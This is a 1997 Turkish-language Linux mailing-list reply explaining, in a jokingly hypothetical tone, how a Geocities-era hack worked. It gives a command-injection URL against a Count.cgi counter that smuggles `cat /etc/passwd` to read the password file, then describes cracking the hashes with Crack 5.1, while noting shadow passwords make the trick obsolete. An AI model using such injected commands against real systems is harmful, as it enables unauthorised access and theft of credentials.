Re: [LINUX:3069] Re: Ynt: Re: Geocities Hack edilir

Sait Karalar (k-sait@bimel.com.tr)
Sat, 1 Nov 1997 18:02:21 +0200 (EET)

Simdi mesela ornegin varsayalim ki atiyorum, senin bi linux un olsun, bi
de

/etc/passwd dosyan olsun, shadow da olmasin...

iste o zaman

Simdi mesela ornegin varsayalim ki yeniden atiyorum, bi de Counter kurlu
olsun ve adi Count.cgi olsun...

sen de

lynx http://www.bilmem_ne.com/cgi-bin/Count.cgi?`cat /etc/passwd`

yapmis ol...

sonra bi de bak bakalim ne gelmis...

Sonra yine atiyorum tutuyorum, inanki oylemesine soyluyorum, valla
kullanmadim ki,
senin bide Crack5.1.tar.gz dosyayi olsun

sen de tar zxvf Crack5.1.tar.gz yap, sonra da compile t sonra da bu
dosyayi , kopyasini almisol, sora da calistir bakalim , amanin amanin,
ne de basit password koyarlarmis de....

Yine yeniden ve bilmeden ruyamda gordum de soyluyorum ki!

Bu numara artik eskidi... shadow password , lynx son version ile bu yolla
bir sey elde etmen zor, usteli Crack5.1 lib leri absurd karakterler
iceren sifreleri bulamamakta...

Not: Bir zamanlar /cgi-bin ne islere alet oldu bilesin, bir de deneyip
goresin, ve de hayal gucunu gelistiresin KI yeni bug lara ve de hack lere
kucak acasin, bi zahmet bulursan bizi de bilgilendiresin diye!

sevgiler & saygilar & hackler...!

Not: bir dosya ariyorsaniz bulmanin en gusel yolu

http://ftpsearch.ntnu.no/ftpsearch adresine girip dosyayi veya bir
parcasini aratmak dan gecer derim...Gerisi size kalmis...

On Sat, 1 Nov 1997, SOYER MUHAMMED wrote:

> bu hack olayini nasil yapiyorsunuz

~ Sait K. METU-CC
Middle East Technical Univ. USG-ADV
Department of Mathematics Consultant